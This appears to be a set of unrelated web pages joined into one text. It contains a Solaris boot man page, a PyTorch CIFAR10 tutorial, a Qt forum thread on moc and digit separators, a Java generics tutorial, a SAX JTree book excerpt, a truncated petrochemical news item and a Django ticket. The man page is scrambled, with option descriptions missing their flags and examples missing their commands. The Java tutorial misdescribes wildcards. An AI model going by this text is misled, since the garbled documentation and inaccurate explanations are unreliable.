NAME | SYNOPSIS | DESCRIPTION | OPTIONS | IA BOOT SEQUENCE DETAILS | IA Primary Boot | IA Secondary Boot | EXAMPLES | FILES | SEE ALSO | WARNINGS | NOTES

mounts filesystems (see vfstab(4)), and runs ufsboot (when booting from a disk) or inetboot (when booting from the network).

Booting from Disk

When booting from disk (or a disk-like device), the bootstrapping process consists of two conceptually distinct phases, primary boot and secondary boot. In the primary boot phase, the PROM loads the primary boot block from blocks 1 to 15 of the disk partition selected as the boot device. If the filename is not given on the command line or otherwise specified, for example, by the boot-file NVRAM variable, boot chooses an appropriate default file to load based on what software is installed on the system, the capabilities of the hardware and firmware, and on a user-configurable policy file (see FILES, below). The OpenBoot boot command takes arguments of the following form. The default boot command has no arguments. It is accepted practice to augment the boot command's policy by modifying the policy file; however, changing boot-file or diag-file may generate unexpected results in certain circumstances. This behavior is found on most OpenBoot 2.x and 3.x based systems. Note that differences may occur on some platforms.

On IA based systems, the bootstrapping process consists of two conceptually distinct phases, primary boot and secondary boot. The primary boot is implemented in the BIOS ROM on the system board, and in BIOS extensions in ROMs on peripheral boards. It is distinguished by its ability to control the installed peripheral devices and to provide I/O services through software interrupts. It begins the booting process by loading the first physical sector from a floppy disk, hard disk, or CD-ROM, or, if supported by the system or network adapter BIOS, by reading a bootstrap program from a network boot server.
The primary boot is implemented in IA real-mode code. The secondary boot is loaded by the primary boot and is implemented in 32-bit, paged, protected-mode code. It also loads and uses peripheral-specific BIOS extensions written in IA real-mode code. The secondary boot is called boot.bin and is capable of reading and booting from a UFS file system on a hard disk or a CD, or by way of a LAN using the NFS protocol. The secondary boot is responsible for running the Configuration Assistant program, which determines the installed devices in the system (possibly with help from the user). The secondary boot then reads the script in /etc/bootrc, which controls the booting process. This file contains boot interpreter commands, which are defined below, and can be modified to change defaults or to adapt to a specific machine. The standard /etc/bootrc script prompts the user to enter a b character to boot with specified options.

Name of a standalone program to boot. If a filename is not explicitly specified, either on the boot command line or in the boot-file NVRAM variable, boot chooses an appropriate default filename. On most systems, the default filename is the 32-bit kernel. On systems capable of supporting both the 32-bit and 64-bit kernels, the 64-bit kernel is chosen in preference to the 32-bit kernel. boot chooses an appropriate default file to boot based on what software is installed on the system, the capabilities of the hardware and firmware, and on a user-configurable policy file. The boot program interprets the -a flag to mean "ask me," and so it prompts for the name of the standalone. The -a flag is then passed to the standalone program. Display verbose debugging information. Explicitly specify the default-file. On some systems, boot chooses a dynamic default file, used when none is otherwise specified.
This option allows the default-file to be explicitly set and can be useful when booting kadb(1M) since, by default, kadb loads the default-file as exported by the boot program. The boot program passes all boot-flags to file. They are not interpreted by boot. See the kernel(1M) and kadb(1M) manual pages for information about the options available with the default standalone program. The boot program passes all client-program-args to file. They are not interpreted by boot. Name of a standalone program to boot. The default is to boot /platform/platform-name/kernel/unix from the root partition, but you can specify another program on the command line. The boot program passes all boot-args to file. They are not interpreted by boot. See kernel(1M) and kadb(1M) for information about the options available with the kernel.

The BIOS attempts to load the first physical sector from the diskette drive, or, if that fails, from the first hard disk. The processor then jumps to the first byte of the sector image in memory. The first sector on a floppy disk contains the master boot block. The boot block is responsible for loading the image of the boot loader strap.com, which then loads the secondary boot, boot.bin. A similar sequence occurs for a CD-ROM: its boot image is loaded and the processor jumps to its first byte in memory. This completes the standard PC-compatible hard disk boot sequence. An IA FDISK partition for the Solaris software begins with a one-cylinder boot slice, which contains the partition boot program (pboot) in the first sector, the standard Solaris disk label and volume table of contents (VTOC) in the second and third sectors, and the bootblk program in the fourth and subsequent sectors. When the FDISK partition for the Solaris software is the active partition, the master boot program (mboot) reads the partition boot program in the first sector into memory and jumps to it. It in turn reads the bootblk program into memory and jumps to it.
Regardless of the type of the active partition, if the drive contains multiple FDISK partitions, the user is given the opportunity to reboot another partition. bootblk or strap.com (depending upon the active partition type) reads boot.bin from the file system in the Solaris root slice and jumps to its first byte in memory. For network booting, you have the choice of the boot floppy or Intel's Preboot eXecution Environment (PXE) standard. When booting from the network using the boot floppy, you can select which network configuration strategy you want by editing the boot properties, changing the setting for net-config-strategy. By default, net-config-strategy is set to rarp. It can have two settings, rarp or dhcp. When booting from the network using PXE, the system or network adapter BIOS uses DHCP to locate a network bootstrap program (NBP) on a boot server and reads it using Trivial File Transfer Protocol (TFTP). The BIOS executes the NBP by jumping to its first byte in memory. The NBP uses DHCP to locate the secondary bootstrap on a boot server, reads it using TFTP, and executes it. The secondary boot, boot.bin, switches the processor to 32-bit, paged, protected mode, and performs some limited machine initialization. It runs the Configuration Assistant program which either auto-boots the system, or presents a list of possible boot devices, depending on the state of the auto-boot? variable (see eeprom(1M)). Disk target devices (including CDROM drives) are expected to contain UFS filesystems. Network devices can be configured to use either DHCP or Reverse Address Resolution Protocol (RARP) and bootparams RPC to discover the machine's IP address and which server will provide the root file system. The root file system is then mounted using NFS. After a successful root mount, boot.bin invokes a command interpreter, which interprets /etc/bootrc. The wide range of hardware that must be supported on IA based systems demands great flexibility in the booting process. 
This flexibility is achieved in part by making the secondary boot programmable. The secondary boot contains an interpreter that accepts a simple command language similar to those of sh and csh. The primary differences are that pipelines, loops, standard output, and output redirection are not supported. The boot interpreter splits input lines into words separated by blanks and tabs. The metacharacters are dollar sign ($), single-quote ('), double-quote ("), number sign (#), new-line, and backslash (\). The special meaning of metacharacters can be avoided by preceding them with a backslash. A new-line preceded by a backslash is treated as a blank. A number sign introduces a comment, which continues to the next new-line. A string enclosed in a pair of single-quote or double-quote characters forms all or part of a single word. White space and new-line characters within a quoted string become part of the word. Characters within a quoted string can be quoted by preceding them with a backslash character; thus a single-quote character can appear in a single-quoted string by preceding it with a backslash. Two backslashes produce a single backslash, and a new-line preceded by a backslash produces a new-line in the string. The boot maintains a set of variables, each of which has a string value. The first character of a variable name must be a letter, and subsequent characters can be letters, digits, or underscores. The set command creates a variable and/or assigns a value to it, or displays the values of variables. The unset command deletes a variable. Variable substitution is performed when the interpreter encounters a dollar-sign that is not preceded by a backslash. The variable name following the dollar sign is replaced by the value of the variable, and parsing continues at the beginning of the value. Variable substitution is performed in double-quoted strings, but not in single-quoted strings. 
A variable name can be enclosed in braces to separate it from following characters. A command is a sequence of words terminated by a new-line character. The first word is the name of the command and subsequent words are arguments to the command. All commands are built-in commands. Standalone programs are executed with the run command. Commands can be conditionally executed by surrounding them with the if, elseif, else, and endif commands: The set, if, and elseif commands evaluate arithmetic expressions with the syntax and semantics of the C programming language. The ||, &&, |, ^, &, ==, !=, <, >, <=, >=, >>, <<, +, -, *, /, %, ~, and ! operators are accepted, as are (, ), and comma. Signed 32-bit integer arithmetic is performed. Expressions are parsed after the full command line has been formed. Each token in an expression must be a separate argument word, so blanks must separate all tokens on the command line. Before an arithmetic operation is performed on an operand word, it is converted from a string to a signed 32-bit integer value. After an optional leading sign, a leading 0 produces octal conversion and a leading 0x or 0X produces hexadecimal conversion. Otherwise, decimal conversion is performed. A string that is not a legal integer is converted to zero. Several built-in functions for string manipulation are provided. Built-in function names begin with a dot. String arguments to these functions are not converted to integers. To cause an operator, for example, -, to be treated as a string, it must be preceded by a backslash, and that backslash must be quoted with another backslash. Also be aware that a null string can produce a blank argument, and thus an expression syntax error. For example: if .strneq ( ${usrarg}X , \- , 1 ) The boot interpreter takes its input from the system console or from one or more files. The source command causes the interpreter to read a file into memory and begin parsing it.
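The quoting, variable, and expression rules above can be illustrated with a short hypothetical /etc/bootrc fragment (this is a sketch, not the shipped script; the kernel path and variable names are illustrative):

     # prompt for a one-character answer; default to booting the kernel
     set usrarg b
     read usrarg
     # tokens in an expression must be blank-separated; the trailing X
     # guards against a null string producing a blank argument
     if .strneq ( ${usrarg}X , b , 1 )
         run /platform/i86pc/kernel/unix
     endif

Here .strneq compares at most one character, so any answer beginning with b boots the kernel.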
The console command causes the interpreter to take its input from the system console. Reaching EOF causes the interpreter to resume parsing the previous input source. CTRL-D entered at the beginning of a console line is treated as EOF. The echo command writes its arguments to the display. The read command reads the system console and assigns word values to its argument variables. The verbose command turns verbose mode on and off. In verbose mode, the interpreter displays lines from the current source file and displays the command as actually executed after variable substitution. The singlestep command turns singlestep mode on and off. In singlestep mode, the interpreter displays step ? before processing the next command, and waits for keyboard input, which is discarded. Processing proceeds when ENTER is pressed. This allows slow execution in verbose mode. When the interpreter is first invoked by the boot, it begins execution of a compiled-in initialization string. This string typically consists of "source /etc/bootrc\n" to run the boot script in the root file system. The boot passes information to standalone programs through arguments to the run command. A standalone program can pass information back to the boot by setting a boot interpreter variable using the var_ops() boot service function. It can also pass information to the kernel using the setprop() boot service function. The whoami property is set to the name of the standalone program. Interpret input from the console until CTRL-D. Display the arguments separated by blanks and terminate with a new-line. Display the arguments separated by blanks, but do not terminate with a new-line. Assign the value of property propname to the variable varname. A property value of length zero produces a null string. If the property does not exist, the variable is not set. Assign the length in hexadecimal of the value of property propname to the variable varname. Property value lengths include the terminating null.
If the property does not exist, the variable is set to 0xFFFFFFFF (-1). If the expression expr is true, execute instructions to the next elseif, else, or endif. If expr is false, do not execute the instructions. If the preceding if and elseif commands all failed, and expr is true, execute instructions to the next elseif, else, or endif. Otherwise, do not execute the instructions. If the preceding if and elseif commands all failed, execute instructions to the next elseif, else, or endif. Otherwise, do not execute the instructions. Revert to the execution mode of the surrounding block. Display a help screen that contains summaries of all available boot shell commands. Read a line from the console, break it into words, and assign them as values to the variables name1, and so forth. Same as read, but timeout after time seconds. Load and transfer control to the standalone program name, passing it arg1 and further arguments. Display all the current variables and their values. Set the value of the variable name to the null string. Set the value of the variable name to word. Set the value of the variable name to the value of expr. expr must consist of more than one word. The value is encoded in unsigned hexadecimal, so that -1 is represented by 0xFFFFFFFF. Set the text mode display attributes. Allowable colors are black, blue, green, cyan, red, magenta, brown, white, gray, lt_blue, lt_green, lt_cyan, lt_red, lt_magenta, yellow, and hi_white. Set the value of the property propname to word. Turn on singlestep mode, in which the interpreter displays step ? before each command is processed, and waits for keyboard input. Press ENTER to execute the next command. Turn off singlestep mode. Read the file name into memory and begin to interpret it. At EOF, return to the previous source of input. Delete the variable name. Turn on verbose mode, which displays lines from source files and commands to be executed. Turn off verbose mode. 
The following built-in functions are accepted within expressions: Returns an integer value that is less than, equal to, or greater than zero, as string1 is lexicographically less than, equal to, or greater than string2. Returns an integer value that is less than, equal to, or greater than zero, as string1 is lexicographically less than, equal to, or greater than string2. At most, n characters are compared. Returns true if string1 is equal to string2, and false otherwise. Returns true if string1 is equal to string2, and false otherwise. At most, n characters are compared. Scans n locations in memory starting at addr, looking for the beginning of string. The string in memory need not be null-terminated. Returns true if string is found, and false otherwise. .strfind can be used to search for strings in the ROM BIOS and BIOS extensions that identify different machines and peripheral boards. To boot the default kernel in single-user interactive mode, respond to the ok prompt with one of the following: To boot kadb specifying the 32-bit kernel as the default file: To boot the 32-bit kernel explicitly, the kernel file name should be specified. So, to boot the 32-bit kernel in single-user interactive mode, respond to the ok prompt with one of the following: To boot the 64-bit kernel explicitly, the kernel file name should be specified. So, to boot the 64-bit kernel in single-user interactive mode, respond to the ok prompt with one of the following: Refer to the NOTES section "Booting UltraSPARC Systems" before booting the 64-bit kernel using an explicit filename. To boot the default kernel in single-user interactive mode, respond to the > prompt with one of the following: second level program to boot from a disk or CD. table in which the "initdefault" state is specified. program that brings the system to the "initdefault" state. Primary and alternate pathnames for the boot policy file. Note that the policy file is not implemented on all platforms.
default program to boot system. default program to boot system. See NOTES section "Booting UltraSPARC Systems." script that controls the booting process. second level boot program used on IA systems (see System Administration Guide: Basic Administration). For more information, see the Sun Hardware Platform Guide. Because the ``-'' key on national language keyboards has been moved, an alternate key must be used to supply arguments to the boot command on an IA based system using these keyboards. Use the ``-'' on the numeric keypad. For example, b -r would be typed as b +r on Swedish keyboards, although the screen display will show b -r.
http://docs.oracle.com/cd/E19683-01/816-5212/6mbcdgjph/index.html
Convert CIFAR10 Dataset from PIL Images to PyTorch Tensors by Using PyTorch's ToTensor Operation

Transcript: Once imported, the CIFAR10 dataset will be an array of Python Imaging Library (PIL) images. This is useful for some applications such as displaying the images on the screen. However, in order to use the images in our deep neural network, we will first need to transform them into PyTorch tensors. Conveniently, the ToTensor function in torchvision.transforms is built for exactly this purpose. First, we need to import torch. import torch Then we need to import torchvision. import torchvision Then we need to import torchvision.datasets as datasets. import torchvision.datasets as datasets Then we need to import torchvision.transforms as transforms. import torchvision.transforms as transforms Now, we need to check that our versions of torch and torchvision are current. print(torch.__version__) print(torchvision.__version__) As of March 22, 2018, 0.3.1 for torch and 0.2.0 for torchvision are the current versions. Now, when we are importing our training and test sets from torchvision.datasets, instead of leaving the transform parameter blank, we will want to set it to the ToTensor transform. cifar_trainset = datasets.CIFAR10(root='./data', train=True, download=True, transform=transforms.ToTensor()) cifar_testset = datasets.CIFAR10(root='./data', train=False, download=True, transform=transforms.ToTensor()) The root, train, and download parameters were covered in the previous video. The transform parameter specifies how we want to transform the imported images; here, transforms.ToTensor() indicates that we want the images converted to PyTorch tensors during import. We are now free to use the tensors in a PyTorch model.
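To make concrete what ToTensor does under the hood, here is a plain-Python sketch (no torch or PIL required; the helper name to_tensor_like is ours, not part of torchvision): it scales 0-255 pixel values to the range [0.0, 1.0] and moves the channel axis first (HWC to CHW), which is the layout PyTorch models expect.

```python
def to_tensor_like(image):
    """image: nested lists of shape [H][W][C] with 0-255 integer pixels.

    Returns nested lists of shape [C][H][W] with floats in [0.0, 1.0],
    mirroring the permutation and scaling that transforms.ToTensor performs.
    """
    h, w, c = len(image), len(image[0]), len(image[0][0])
    return [[[image[y][x][ch] / 255.0 for x in range(w)]
             for y in range(h)]
            for ch in range(c)]

# A tiny 2x2 RGB "image"
img = [[[255, 0, 0], [0, 255, 0]],
       [[0, 0, 255], [255, 255, 255]]]
chw = to_tensor_like(img)
print(len(chw), len(chw[0]), len(chw[0][0]))  # 3 2 2  (C, H, W)
```

The real ToTensor returns a torch.Tensor, of course, but the shape and scaling conventions are the same.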
https://aiworkbox.com/lessons/convert-cifar10-dataset-from-pil-images-to-pytorch-tensors
moc cpp generation fails with "No relevant classes found. No output generated."

I have a class D11 that inherits from class B1 that inherits QObject. B1 has declared Q_OBJECT, and so does D11. (Well, D11 tries to). But I'm running into the infamous 'undefined reference to vtable' error in the constructor and destructor of D11. This issue has popped up many times before on these forums, and I have tried all the usual recommendations:
- The failing class is indeed in separate files (D11.h and D11.cpp).
- I have tried Build > Run qmake from QtCreator.
- Deleted the build dir, run qmake from QtCreator, and run build again.

The moc build step to generate moc_D11.cpp results in the following:

D11.h:0: Note: No relevant classes found. No output generated.

and indeed, moc_D11.cpp is an empty file. I have many other files in my project with the exact same hierarchies:

QObject <-- B1 <-- D11
QObject <-- B1 <-- D12
QObject <-- B1 <-- D13
QObject <-- B2 <-- D21

None of these have any problems. In particular, D12 and D13 that derive from B1 and are (obviously) fairly similar to D11 are fine and have their moc_D12.cpp and moc_D13.cpp generated just fine. This is being cross-compiled to an RPi, but I'm not sure that should matter. The moc command is fairly long, but I have checked it meticulously, switch-by-switch, between the versions that work (D12, D13) vs D11, which doesn't work. Unfortunately the project is both large as well as proprietary, so I cannot post it - and of course a toy example is not going to show this (and/or would be easy to resolve). Still, if there is anything else I can try, I will welcome suggestions.

- jsulm Lifetime Qt Champion last edited by

Not sure if it will help, but here is an obfuscated version.

D11.h:

#ifndef D11_H
#define D11_H

#include "b1.h"

class B2;

class D11 : public B1
{
    Q_OBJECT // <-- this is causing "undefined reference to vtable for D11" WHY!??
public:
    D11(const B2& s);
    ~D11() override;

    void processRawData(const QByteArray& etba) override;

protected:
    void initFSMs() override;
    void setLock(byte prefix) override;
    void dropLock() override;
    void updateFsm1(byte prefix) override;
    void updateFsm2(byte prefix) override;
    bool updateFsm3(byte dataByte) override;
    bool extractVals(byte dataByte) override;
    void signExtend(int& val) override;

signals:
    void signal1();
    void signal2();

private:
    const int CONST1 = 0b1000'0000;
    const int CONST2 = 0b0100'0000;
    const int MASK   = 0b0010'0000;

    // About 15-20 int and bool private members here...

    enum class Fsm1State { ...names here... };
    enum class Fsm2State { ...names here... };
    enum class Fsm3State { ...names here... };

    Fsm1State mFsm1State;
    Fsm2State mFsm2State;
    Fsm3State mFsm3State;

    bool fn1(byte dataByte);
    bool fn2(byte dataByte);
    bool fn3(byte dataByte);
    bool fn4(byte dataByte);
};

#endif // D11_H

D11.cpp:

#include "d11.h"
#include "B2dir/b2.h"

D11::D11(const B2& s) : B1(s)
{
    initFSMs();
}

D11::~D11()
{
    qDebug("D11 dtor");
}

void D11::initFSMs()
{
    mFsm1State = Fsm1State::NAME1;
    mFsm2State = Fsm2State::NAME1;
}

void D11::processRawData(const QByteArray &etba)
{
    for (byte dataByte : etba) {
        . . .
    }
    emit mBase2.b2signal();
}

// Other vanilla member function definitions here...

B1.h:

#ifndef B1_H
#define B1_H

#include <QObject>
...other QIncludes here, like QByteArray etc...
class B2;

class B1 : public QObject
{
    Q_OBJECT
public:
    explicit B1(const B2& s, QObject *parent = nullptr);
    virtual ~B1();

    using byte = unsigned char;

signals:

public slots:

public:
    virtual void processRawData(const QByteArray& etba) = 0;

protected:
    // some int/bool members here
    const B2& mBase2;

    virtual void initFSMs() = 0;
    virtual void setLock(byte dataByte) = 0;
    virtual void dropLock() = 0;
    virtual void updateFsm1(byte dataByte) = 0;
    virtual void updateFsm2(byte dataByte) = 0;
    virtual bool updateFsm3(byte dataByte) = 0;
    virtual bool extractVals(byte dataByte) = 0;
    virtual void signExtend(int& val) = 0;
};

#endif // B1_H

B1.cpp:

#include "b1.h"
#include "B2dir/b2.h"

B1::B1(const B2& s, QObject *parent) : QObject(parent), mBase2(s)
{
    qDebug("B1 abstract base class ctor");
}

B1::~B1()
{
    qDebug("B1 abstract base class dtor");
}

I'm happy to provide any specific additional information. I can comment out the Q_OBJECT in D11 and of course it builds just fine.

Hi, Did you re-run qmake after adding the Q_OBJECT macro ?

@sgaist yes, see my first post. In particular, I have tried deleting the build directory, rerunning qmake and rerunning the entire build after that. Is there a verbose mode to the moc command that will elaborate on the "No relevant classes found"?

Quite incredibly, it turned out that the moc error was because moc's parser was not able to comprehend the C++14 digit separators in the constants I had in the private section of my class! Removing the digit separators enabled the moc compilation to go through without errors! So this doesn't work:

private:
    const int CONST1 = 0b1000'0000;

This works:

private:
    const int CONST1 = 0b10000000;

I have found C++14 digit separator support to be abysmal within the Qt ecosystem, from Qt Creator to now moc. I will personally just stop using it till Qt 6 at least; hopefully it will improve by then :P

Opening a feature request will be a better idea, it will make the issue known to moc's developers.
- aha_1980 Lifetime Qt Champion last edited by

Please post a link to the report here too, so others can follow later. Thanks!

Remove (no clean) build directory and build project.

@SGaist @aha_1980 Bug report here:

I also found other bugs filed against moc that one would need to watch out for:
- moc does not support raw string literals:
- moc does not support (certain?) unicode files:

These will also result in the "No relevant classes found" error.

Thanks for sharing your additional findings !
https://forum.qt.io/topic/105770/moc-cpp-generation-fails-with-no-relevant-classes-found-no-output-generated
Why do we need Generics? Generics in Java is a concept which allows the user to choose the reference type that a method, constructor, or class accepts. By using generics, we can make a class, interface, or method accept any reference type as a parameter. Please check out the example below:

class Generics {
    Integer work;
    Generics(Integer work) {
        this.work = work;
    }
    public void display() {
        System.out.println("Working hours: " + this.work);
    }
}

public class GenericsMain {
    public static void main(String[] args) {
        Generics generic = new Generics(10);
        generic.display();
    }
}

Generic class

A class is generic if it declares one or more type variables. In the example we are using the E type parameter to create a generic class of a specific type.

class Worker<E> {
    E obj;
    void add(E obj) { this.obj = obj; }
    E get() { return obj; }
}

Generic Interfaces

A generic interface has a name and a formal type parameter E. The other parts of the interface use E as they would use an actual type, e.g. String.

public interface Worker<E> {
    void move(E e, String code);
    E getTerm();
    String getMove();
}

Generic Methods and Constructors

Constructors can also be generic. Even a non-generic class can have a generic constructor. Constructors are like methods but without return types.

class WorkerClass {
    public <E> WorkerClass(E tm) {
        E tmp = tm;
        System.out.println(tmp);
    }
}

public class Generic {
    public static void main(String[] args) {
        WorkerClass wr1 = new WorkerClass(10);
        WorkerClass wr2 = new WorkerClass("ed");
        WorkerClass wr3 = new WorkerClass(3.2);
    }
}

Bounded Types

Bounded types were introduced in generics. Using bounded type parameters, you can restrict the objects of a generic class to hold data of specific derived types.

class Worker<E extends Number> {
    E tm;
    public Worker(E tm) {
        this.tm = tm;
    }
    public E getE() {
        return tm;
    }
}

Wildcard Arguments

Wildcards are a mechanism in Java aimed at making it possible to cast a collection of a certain class, e.g. E, to a collection of a subclass or superclass of E.
static <E> boolean worker(List<E> tm) {
    return tm.add(tm.remove(0));
}

Generics and Their Inheritance

Inheritance is an OOP concept, and generics are a compile-time feature that allows you to specify type parameters for types that expose them. Inheritance allows me to create one type:

class Name {}

and then later create another type that extends Name:

class FullName extends Name {}

Type Erasure

Type erasure is the process by which the compiler replaces generic type parameters with actual classes. Type erasure ensures that no extra classes are created and there is no runtime overhead.

class Worker<E> {
    E tmp;
    Worker(E wr) {
        tmp = wr;
    }
    E get() {
        return tmp;
    }
}

After compilation, the unbounded type parameter E is erased and replaced with Object:

class Worker {
    Object tmp;
    Worker(Object wr) {
        tmp = wr;
    }
    Object get() {
        return tmp;
    }
}
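Putting the pieces together, here is a small runnable sketch (class names are illustrative, not taken from the article) showing a generic class and a bounded type parameter in use:

```java
// A plain generic container: E can be any reference type.
class Box<E> {
    private E value;
    void set(E value) { this.value = value; }
    E get() { return value; }
}

// The bound restricts E to Number and its subclasses, so numeric
// operations like doubleValue() are available on the stored value.
class NumberBox<E extends Number> {
    private final E value;
    NumberBox(E value) { this.value = value; }
    double asDouble() { return value.doubleValue(); }
}

public class GenericsDemo {
    public static void main(String[] args) {
        Box<String> b = new Box<>();
        b.set("hours");
        System.out.println(b.get());          // hours

        NumberBox<Integer> n = new NumberBox<>(10);
        System.out.println(n.asDouble());     // 10.0
        // NumberBox<String> would not compile: String is not a Number.
    }
}
```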
https://codingsmania.in/generics-in-java/
In a very real sense, SAX reports tags, not elements. When the parser encounters a start-tag, it calls the startElement() method. When the parser encounters an end-tag, it calls the endElement() method. When the parser encounters an empty-element tag, it calls the startElement() method and then the endElement() method. If an end-tag does not match its corresponding start-tag, then the parser throws a SAXParseException. Beyond that, however, you are responsible for tracking the hierarchy. For example, if you want to treat a params element inside a methodCall element differently from a params element inside a fault element, then you’ll need to store some form of state in-between calls to the startElement() and endElement() methods. This is actually quite common. Many SAX content handlers simply build up a data structure as the document is parsed, and then operate on that data structure once the document has been completely read. Provided the data structure is simpler than the XML document itself, this is a reasonable approach. However in the most general case you can find yourself inventing a complete object hierarchy to represent arbitrary XML documents. In this case, you’re better off using DOM or JDOM instead of SAX, since they’ll do the hard work of defining and building this object hierarchy for you. The arguments to the startElement() and endElement() methods are similar: public void startElement(String namespaceURI, String localName, String qualifiedName, Attributes atts) throws SAXException; public void endElement(String namespaceURI, String localName, String qualifiedName) throws SAXException; First the namespace URI is passed as a String. If the element is unqualified (i.e. it is not in a namespace), then this argument is the empty string, not null. Next the local name is passed as a String. This is the part of the name after the prefix and the colon, if any. For instance, if an element is named SOAP-ENV:Body, then its local name is Body. 
However, if an element is named Body with no prefix, then its local name is still Body. The third argument contains the qualified name as a String. This is the entire element name including the prefix and the colon, if any. For instance, if an element is named SOAP-ENV:Body, then its qualified name is SOAP-ENV:Body. However, if an element is named Body with no prefix, then its qualified name is just Body. Finally in the startElement() method only, the set of attributes for that element is passed as a SAX-specific Attributes object. I’ll discuss this in the next section.

As an example I’m going to build a GUI representation of the tree structure of an XML document that allows you to collapse and expand the individual elements. The GUI parts will be provided by a javax.swing.JTree. The tree will be filled in startElement() and displayed in a window in endDocument(). Example 6.7 shows how.

Example 6.7. A ContentHandler class that builds a GUI representation of an XML document

import org.xml.sax.*;
import org.xml.sax.helpers.*;
import javax.swing.*;
import javax.swing.tree.*;
import java.util.*;

public class TreeViewer extends DefaultHandler {

  private Stack nodes;

  // Initialize the per-document data structures
  public void startDocument() throws SAXException {
    // The stack needs to be reinitialized for each document
    // because an exception might have interrupted parsing of a
    // previous document, leaving an unempty stack.
    nodes = new Stack();
  }

  // Make sure we always have the root element
  private TreeNode root;

  // Initialize the per-element data structures
  public void startElement(String namespaceURI, String localName,
      String qualifiedName, Attributes atts) {

    String data;
    if (namespaceURI.equals("")) data = localName;
    else {
      data = '{' + namespaceURI + "} " + qualifiedName;
    }
    MutableTreeNode node = new DefaultMutableTreeNode(data);
    try {
      MutableTreeNode parent = (MutableTreeNode) nodes.peek();
      parent.insert(node, parent.getChildCount());
    }
    catch (EmptyStackException e) {
      root = node;
    }
    nodes.push(node);
  }

  public void endElement(String namespaceURI, String localName,
      String qualifiedName) {
    nodes.pop();
  }

  // Flush and commit the per-document data structures
  public void endDocument() {
    JTree tree = new JTree(root);
    JScrollPane treeView = new JScrollPane(tree);
    JFrame f = new JFrame("XML Tree");
    f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
    f.getContentPane().add(treeView);
    f.pack();
    f.show();
  }

  public static void main(String[] args) {

    try {
      XMLReader parser = XMLReaderFactory.createXMLReader(
        "org.apache.xerces.parsers.SAXParser"
      );
      ContentHandler handler = new TreeViewer();
      parser.setContentHandler(handler);
      for (int i = 0; i < args.length; i++) {
        parser.parse(args[i]);
      }
    }
    catch (Exception e) {
      System.err.println(e);
    }

  } // end main()

} // end TreeViewer

The JTree class provides a ready-made data structure for this program. All we have to do is fill it. However, it’s also necessary to track where we are in the XML hierarchy at all times so that the parent to which the current node will be added is accessible. For this purpose a stack is very helpful. The parent element can be pushed onto the stack in startElement() and popped off the stack in endElement(). Since SAX’s beginning-to-end parsing of an XML document equates to a depth-first tree traversal, the top element in the stack always contains the most recently visited element.
I find stacks like this to be very useful in many SAX programs. More complex programs may need to build more complicated tree or object structures. If your purpose is not simply to display a GUI for the tree, then you should probably roll your own tree structure rather than using JTree as I've done here. TreeViewer runs with the default distribution of Java 1.2 or later. It can run with Java 1.1, but you'll need to make sure the swingall.jar archive is somewhere in your class path. The javax.swing classes used here are not bundled with the JDK 1.1. Figure 6.1 shows this program displaying Example 1.7 from Chapter 1. Swing allows individual parts of the tree to be collapsed or expanded, but the entire element tree is always present even if it's hidden. JTree also allows you to customize the icons used, and even enable the user to edit the tree. However, since that's purely Swing programming and says little to nothing about XML, I leave that as an exercise for the reader. This makes a nice little example, but please don't treat it as more than that. The tantalizing ease of representing XML documents with widgets like javax.swing.JTree and similar things in Windows, Motif, and other GUIs has spawned a lot of editors and browsers that use these tree models as user interfaces. However, not a lot of thought went into whether users actually thought of XML documents this way or could be quickly trained to do so. In actual practice, user interfaces of this sort have failed spectacularly. A good user interface for XML editors and viewers looks a lot more like the user interfaces people are accustomed to from traditional programs such as Microsoft Word, Netscape Navigator, and Adobe Illustrator. The whole point of a GUI is that it can decouple the user interface from the underlying data model. Just because an XML document is a tree is no excuse for making users edit trees when they don't want to.
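The same sort of stack that TreeViewer keeps can also answer the context question raised earlier: is this params element inside a methodCall or inside a fault? The sketch below is my own, not from the book (the class and counter names are hypothetical); it pushes local names on the way down and peeks at the top of the stack to learn the parent of each element.

```java
import org.xml.sax.Attributes;
import org.xml.sax.helpers.DefaultHandler;
import java.util.Stack;

// Hypothetical handler: counts params elements by the element they appear in.
public class ParamsContextHandler extends DefaultHandler {

  private Stack ancestors = new Stack();
  public int methodCallParams = 0;
  public int faultParams = 0;

  public void startElement(String namespaceURI, String localName,
   String qualifiedName, Attributes atts) {
    // Before pushing, the top of the stack is this element's parent.
    if (localName.equals("params") && !ancestors.isEmpty()) {
      String parent = (String) ancestors.peek();
      if (parent.equals("methodCall")) methodCallParams++;
      else if (parent.equals("fault")) faultParams++;
    }
    ancestors.push(localName);
  }

  public void endElement(String namespaceURI, String localName,
   String qualifiedName) {
    ancestors.pop();
  }
}
```

Because the handler holds no reference to the document itself, it can be exercised by invoking the callbacks directly in the order a parser would, which makes this style of state-tracking easy to unit test.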
28 September 2012 10:22 [Source: ICIS news] SINGAPORE (ICIS)--China's linear low density polyethylene (LLDPE) futures continued to inch up on Friday on the back of rising crude prices, but the weakness in the global economy still weighed on market sentiment, industry sources said. January LLDPE futures, the most actively traded contract on the Dalian Commodity Exchange (DCE), closed at yuan (CNY) 10,625/tonne ($1,687/tonne), up by 0.33% or CNY35/tonne from Thursday's settlement price of CNY10,590/tonne. Around 441,435 tonnes of LLDPE or 176,574 contracts for delivery in January 2013 were traded on Friday, according to DCE data. ($1 = CNY6
Opened 6 years ago
Closed 6 years ago
Last modified 6 years ago

#15168 closed (wontfix)

feature request - New setting

Description

My request: Please add another settings option like: DISCOVER_LANGUAGE, which is set to True by default.

My problem: I have a site in 5 languages (et, en, ru, lv, lt); the default language is set to 'et'. My browser (like 75% of browsers used by Estonians) is in English though. For that reason Django sets the default language to 'en' when I visit my site for the first time. Many people in small countries use browsers which have English as their default language. The reason behind this is that the programs have either not been translated, or the translation or vocabulary used is horrible. You can't expect all those people to know that they should go and set their browser accept language to something other than en-us.

My solution: create a settings option which allows us to turn off that accept-headers-based language detection. For now I'm forced to comment that part of the code out, because Estonians simply want to see their damn pages in Estonian :P

Alan.

Change History (8)

comment:1 Changed 6 years ago by

comment:2 Changed 6 years ago by

Look - I need the middleware. The middleware works just fine. It's just this one specific piece of code in django.utils.translation.trans_real, get_language_from_request, that does not provide the desired results. Like I explained in the original post, language discovery based on accept headers shows pages in an undesired language on the first visit. For that reason the aforementioned method looks like this in my Django install right now:

def get_language_from_request(request):
    """
    Analyzes the request to find what language the user wants the system to
    show. Only languages listed in settings.LANGUAGES are taken into account.
    If the user requests a sublanguage where we have a main language, we send
    out the main language.
    """
    global _accepted
    from django.conf import settings
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
    supported = dict(settings.LANGUAGES)
    if hasattr(request, 'session'):
